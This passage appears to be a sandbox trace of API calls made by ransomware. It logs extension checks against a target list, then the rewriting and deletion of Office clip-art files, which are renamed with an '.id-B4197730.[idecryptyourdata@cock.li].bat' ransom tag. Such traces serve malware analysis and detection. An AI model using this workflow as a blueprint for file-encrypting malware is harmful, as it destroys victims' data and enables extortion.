lstrlenW (lpString=".7z") returned 3 [0068.347] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 68 [0068.347] lstrlenW (lpString=".dbf") returned 4 [0068.347] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 68 [0068.347] lstrlenW (lpString=".1cd") returned 4 [0068.347] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 68 [0068.347] lstrlenW (lpString=".jpg") returned 4 [0068.347] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.347] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.347] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02312_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.348] GetLastError () returned 0x0 [0068.348] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x136a, lpOverlapped=0x0) returned 1 [0068.355] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1370, lpOverlapped=0x0) returned 1 [0068.355] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.355] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.355] SetEndOfFile (hFile=0x354) returned 1 [0068.356] CloseHandle (hObject=0x354) returned 1 [0068.356] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.356] SetEndOfFile (hFile=0x2c8) returned 1 [0068.356] CloseHandle (hObject=0x2c8) returned 1 [0068.357] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.357] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02312_.wmf")) returned 1 [0068.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 68 [0068.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 68 [0068.357] lstrlenW (lpString=".doc") returned 4 [0068.357] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.357] lstrlenW (lpString=".docx") returned 5 [0068.357] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.357] lstrlenW (lpString=".pdf") returned 4 [0068.357] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.357] lstrlenW (lpString=".xls") returned 4 [0068.357] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.357] lstrlenW (lpString=".xlsx") returned 5 [0068.357] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.357] lstrlenW (lpString=".ppt") returned 4 [0068.357] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 68 [0068.358] lstrlenW (lpString=".zip") returned 4 [0068.358] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.358] lstrlenW (lpString=".rar") returned 4 [0068.358] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.358] lstrlenW (lpString=".bz2") returned 4 [0068.358] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.358] lstrlenW (lpString=".7z") returned 3 [0068.358] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 68 [0068.358] lstrlenW (lpString=".dbf") returned 4 [0068.358] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 68 [0068.358] lstrlenW (lpString=".1cd") returned 4 [0068.358] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 68 [0068.358] lstrlenW (lpString=".jpg") returned 4 [0068.358] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.358] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.358] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00005_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.359] GetLastError () returned 0x0 [0068.359] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x5b04, lpOverlapped=0x0) returned 1 [0068.365] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x5b10, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x5b10, lpOverlapped=0x0) returned 1 [0068.366] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.366] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.366] SetEndOfFile (hFile=0x354) returned 1 [0068.366] CloseHandle (hObject=0x354) returned 1 [0068.366] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.366] SetEndOfFile (hFile=0x2c8) returned 1 [0068.367] CloseHandle (hObject=0x2c8) returned 1 [0068.367] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.367] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00005_.wmf")) returned 1 [0068.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 68 [0068.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 68 [0068.368] lstrlenW (lpString=".doc") returned 4 [0068.368] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.368] lstrlenW (lpString=".docx") returned 5 [0068.368] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.368] lstrlenW (lpString=".pdf") returned 4 [0068.368] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.368] lstrlenW (lpString=".xls") returned 4 [0068.368] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.368] lstrlenW (lpString=".xlsx") returned 5 [0068.368] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.368] lstrlenW (lpString=".ppt") returned 4 [0068.368] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 68 [0068.368] lstrlenW (lpString=".zip") returned 4 [0068.368] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.368] lstrlenW (lpString=".rar") returned 4 [0068.368] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.368] lstrlenW (lpString=".bz2") returned 4 [0068.368] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.368] lstrlenW (lpString=".7z") returned 3 [0068.368] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 68 [0068.368] lstrlenW (lpString=".dbf") returned 4 [0068.369] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 68 [0068.369] lstrlenW (lpString=".1cd") returned 4 [0068.369] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 68 [0068.369] lstrlenW (lpString=".jpg") returned 4 [0068.369] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.371] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.371] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00116_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0068.371] GetLastError () returned 0x0 [0068.371] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x3dec, lpOverlapped=0x0) returned 1 [0068.425] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x3df0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x3df0, lpOverlapped=0x0) returned 1 [0068.426] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.426] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.427] SetEndOfFile (hFile=0x2c0) returned 1 [0068.427] CloseHandle (hObject=0x2c0) returned 1 [0068.427] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.427] SetEndOfFile (hFile=0x340) returned 1 [0068.428] CloseHandle (hObject=0x340) returned 1 [0068.428] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.428] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00116_.wmf")) returned 1 [0068.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 68 [0068.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 68 [0068.428] lstrlenW (lpString=".doc") returned 4 [0068.428] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.428] lstrlenW (lpString=".docx") returned 5 [0068.428] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.428] lstrlenW (lpString=".pdf") returned 4 [0068.428] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.428] lstrlenW (lpString=".xls") returned 4 [0068.429] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.429] lstrlenW (lpString=".xlsx") returned 5 [0068.429] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.429] lstrlenW (lpString=".ppt") returned 4 [0068.429] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 68 [0068.429] lstrlenW (lpString=".zip") returned 4 [0068.429] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.429] lstrlenW (lpString=".rar") returned 4 [0068.429] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.429] lstrlenW (lpString=".bz2") returned 4 [0068.429] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.429] lstrlenW (lpString=".7z") returned 3 [0068.429] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 68 [0068.429] lstrlenW (lpString=".dbf") returned 4 [0068.429] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 68 [0068.429] lstrlenW (lpString=".1cd") returned 4 [0068.429] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 68 [0068.429] lstrlenW (lpString=".jpg") returned 4 [0068.429] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.429] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.429] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00233_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0068.430] GetLastError () returned 0x0 [0068.430] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x2bb6, lpOverlapped=0x0) returned 1 [0068.435] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x2bc0, lpOverlapped=0x0) returned 1 [0068.436] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.436] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.436] SetEndOfFile (hFile=0x2c0) returned 1 [0068.437] CloseHandle (hObject=0x2c0) returned 1 [0068.437] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.437] SetEndOfFile (hFile=0x340) returned 1 [0068.437] CloseHandle (hObject=0x340) returned 1 [0068.438] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.438] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00233_.wmf")) returned 1 [0068.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 68 [0068.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 68 [0068.438] lstrlenW (lpString=".doc") returned 4 [0068.438] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.438] lstrlenW (lpString=".docx") returned 5 [0068.438] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.438] lstrlenW (lpString=".pdf") returned 4 [0068.438] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.438] lstrlenW (lpString=".xls") returned 4 [0068.438] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.438] lstrlenW (lpString=".xlsx") returned 5 [0068.438] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.438] lstrlenW (lpString=".ppt") returned 4 [0068.439] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 68 [0068.439] lstrlenW (lpString=".zip") returned 4 [0068.439] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.439] lstrlenW (lpString=".rar") returned 4 [0068.439] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.439] lstrlenW (lpString=".bz2") returned 4 [0068.439] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.439] lstrlenW (lpString=".7z") returned 3 [0068.439] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 68 [0068.439] lstrlenW (lpString=".dbf") returned 4 [0068.439] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 68 [0068.439] lstrlenW (lpString=".1cd") returned 4 [0068.439] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 68 [0068.439] lstrlenW (lpString=".jpg") returned 4 [0068.439] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.443] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.444] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00343_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0068.444] GetLastError () returned 0x0 [0068.444] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x764, lpOverlapped=0x0) returned 1 [0068.454] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x770, lpOverlapped=0x0) returned 1 [0068.455] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.455] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.455] SetEndOfFile (hFile=0x368) returned 1 [0068.455] CloseHandle (hObject=0x368) returned 1 [0068.455] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.455] SetEndOfFile (hFile=0x388) returned 1 [0068.456] CloseHandle (hObject=0x388) returned 1 [0068.456] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.456] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00343_.wmf")) returned 1 [0068.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 68 [0068.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 68 [0068.457] lstrlenW (lpString=".doc") returned 4 [0068.457] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.457] lstrlenW (lpString=".docx") returned 5 [0068.457] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.457] lstrlenW (lpString=".pdf") returned 4 [0068.457] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.457] lstrlenW (lpString=".xls") returned 4 [0068.457] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.457] lstrlenW (lpString=".xlsx") returned 5 [0068.457] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.457] lstrlenW (lpString=".ppt") returned 4 [0068.457] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 68 [0068.457] lstrlenW (lpString=".zip") returned 4 [0068.457] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.457] lstrlenW (lpString=".rar") returned 4 [0068.457] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.457] lstrlenW (lpString=".bz2") returned 4 [0068.457] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.457] lstrlenW (lpString=".7z") returned 3 [0068.457] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 68 [0068.457] lstrlenW (lpString=".dbf") returned 4 [0068.457] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 68 [0068.457] lstrlenW (lpString=".1cd") returned 4 [0068.457] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 68 [0068.457] lstrlenW (lpString=".jpg") returned 4 [0068.457] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.458] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.458] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00557_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0068.458] GetLastError () returned 0x0 [0068.458] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x23d4, lpOverlapped=0x0) returned 1 [0068.460] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x23e0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, 